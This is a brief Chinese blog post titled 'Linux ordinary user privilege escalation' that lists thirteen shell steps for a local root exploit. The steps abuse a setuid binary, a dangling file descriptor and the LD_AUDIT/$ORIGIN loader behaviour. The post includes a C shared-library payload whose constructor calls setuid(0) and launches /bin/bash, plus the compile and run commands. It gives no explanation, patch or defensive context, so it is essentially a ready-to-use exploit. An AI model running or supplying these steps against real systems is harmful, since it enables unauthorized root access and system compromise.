linux普通用户提权

1.useradd test

2.passwd test

3.mkdir /tmp/exploit

4.ln -s /usr/bin/ping /tmp/exploit/target

5.exec 3< /tmp/exploit/target

6.ls -l /proc/$$/fd/3

7.rm -rf /tmp/exploit

8.ls -l /proc/$$/fd/3

9.vim payload.c

void __attribute__((constructor)) init()

{

setuid(0); system("/bin/bash");

}

10.gcc -w -fPIC -shared -o /tmp/exploit payload.c

11.ls -l /tmp/exploit

12.LD_AUDIT="$ORIGIN" exec /proc/self/fd/3

13.whoami

posted @ 2019-11-19 15:32 qcuser 阅读(1995) 评论(0) 编辑收藏举报

刷新页面返回顶部

qcuser